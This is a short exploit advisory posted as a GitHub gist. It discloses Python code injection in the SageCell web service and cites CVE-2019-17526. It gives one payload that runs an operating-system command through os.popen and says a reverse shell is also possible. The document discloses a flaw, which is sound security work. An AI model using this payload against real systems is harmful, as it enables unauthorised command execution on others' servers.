Created
October 13, 2019 17:54
-
-
Save barrett092/0380a1c34c014e29b827d1f408381525 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: SageCell Python Web Injection Vulnerability | |
| # Google Dork: | |
| # Date: 10/13/19 | |
| # Exploit Author: Christopher J. Barretto @ Advoqt | |
| # Vendor Homepage: www.advoqt.com | |
| # Software Link: https://sagecell.sagemath.org/ | |
| # Version: SageCell - ALL VERSIONS | |
| # Tested on: Unix | |
| # CVE : CVE-2019-17526 (issued in progress) | |
| Python Code Injection can occur in the context of an internet facing web application. Malicious actors can execute arbitrary commands on the | |
| underlying operating system, as demonstrated by: | |
| __import__('os').popen('whoami').read() | |
| Can also gain reverse shell. | |
| NOTE: The vendor's position is that the product is "vulnerable by design" and the current behavior will be retained. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment